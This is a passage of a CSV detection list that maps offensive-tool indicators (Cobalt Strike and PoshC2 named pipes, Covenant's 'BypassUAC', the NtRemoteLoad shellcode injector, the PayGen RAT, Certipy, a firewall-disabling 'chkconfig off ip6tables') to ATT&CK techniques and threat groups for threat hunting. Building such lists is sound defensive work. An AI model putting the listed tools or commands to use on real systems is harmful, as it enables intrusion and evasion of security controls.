T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\mypipe-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 
18),10,10,N/A,N/A,N/A,N/A -\\netlogon_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\ntsvcs*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\PGMessagePipe*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\postex_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments 
that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\postex_ssh_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\samr_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\scerpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\SearchTextHarvester*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\spoolss_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\srvsvc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\status_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\UIA_PIPE*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\win\msrpc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\winsock*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A 
-\\Winsock2\CatalogChangeListener-*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\\wkssvc_*,offensive_tool_keyword,cobaltstrike,pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,pipe names (sysmon EID 17 - 18),10,10,N/A,N/A,N/A,N/A -\adhunt.py,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -\jaccdpqnvbrrxlaf*,offensive_tool_keyword,poshc2,pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,pipe names (sysmon EID 17 - 18),10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -\kali-linux-2023*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -\NtRemoteLoad.exe*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -\Posh*,offensive_tool_keyword,poshc2,pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,pipe names (sysmon EID 17 - 18),10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -afrog -*,offensive_tool_keyword,afrog,A tool for finding vulnerabilities,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/zan8in/afrog,1,0,N/A,N/A,10,2135,272,2023-09-28T09:41:46Z,2022-02-24T06:00:32Z -BypassUAC *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -capinfos -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & 
Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -captype -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -cd PayGen,offensive_tool_keyword,PayGen,FUD metasploit Persistence RAT,T1587 T1048 T1588 T1102 T1041,N/A,N/A,N/A,RAT,https://github.com/youhacker55/PayGen,1,0,N/A,N/A,,N/A,,, -certipy *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -chkconfig off ip6tables,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with 